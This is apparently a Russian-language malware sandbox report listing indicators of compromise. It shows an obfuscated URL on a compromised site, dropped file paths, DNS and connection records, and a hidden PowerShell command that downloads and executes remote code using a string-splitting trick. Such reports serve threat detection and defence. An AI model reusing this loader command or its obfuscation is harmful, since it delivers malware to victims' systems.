Техническая информация
- ht+t+ps://ri+eses+h+op+ping+.i+t/w+p-cont+ent/pl+ugins/a+ms+s.jp+g
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1528
- %HOMEPATH%\application data\microsoft\forms\winword.box
- %TEMP%\1073583.cvr
- 'ri####hopping.it':443
- 'ri####hopping.it':443
- DNS ASK ri####hopping.it
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ex byPASS -NOp -windowstyle hidden -c IEX(New-Object System.Net.WebClient).DownloadString('ht'+'t'+'ps://ri'+'eses'+'h'+'op'+'ping'+'.i'+'t/w'+'p-cont'+'en...' (со скрытым окном)